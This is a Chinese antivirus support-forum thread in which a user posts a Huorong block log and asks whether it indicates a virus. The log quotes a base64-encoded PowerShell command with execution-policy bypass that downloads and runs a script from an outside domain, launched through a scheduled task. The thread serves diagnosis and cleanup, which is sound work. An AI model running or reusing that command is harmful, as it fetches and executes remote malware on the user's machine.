请火绒专家帮忙看看，昨天和今天老弹出这个，是病毒吗？

馬飛 · 发表于 2020-4-21 07:36:07

【1】2020-04-21 00:27:07,系统防护,系统加固,svchost.exe触犯敏感动作防护规则, 已阻止

操作进程：C:\WINDOWS\system32\svchost.exe
命令行：C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s Schedule
父进程：C:\WINDOWS\system32\services.exe
防护项目：利用PowerShell执行可疑脚本
执行文件：C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行：powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAHMALgBzAHMAbABzAG4AZwB5AGwAOQAwAC4AYwBvAG0AJwApACkA
操作结果：已阻止

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

火绒运营专员 · 发表于 2020-4-21 09:55:02

您好，建议您全盘查杀，之后重启电脑，观察下，如果仍然无法解决问题，请添加QQ：2208613431，我们远程帮您看下问题，感谢您的反馈！

馬飛 · 发表于 2020-4-21 21:54:26

火绒运营专员发表于 2020-4-21 09:55
您好，建议您全盘查杀，之后重启电脑，观察下，如果仍然无法解决问题，请添加QQ：2208613431，我们远程帮您 ...

非常感谢，我把我安装破解的迅雷给卸载了，进行了全盘杀，今天下班回来，目前使用了几个小时，暂时未有这个报告了。

火绒运营专员 · 发表于 2020-4-24 19:00:40

您好，您的问题后来有复现嘛~

火绒运营专员 · 发表于 2020-4-27 16:39:49

您好，没有收到您的回复，帖子就先帮您关闭了，后期有问题，欢迎通过论坛联系我们，会有专人跟进，感谢反馈！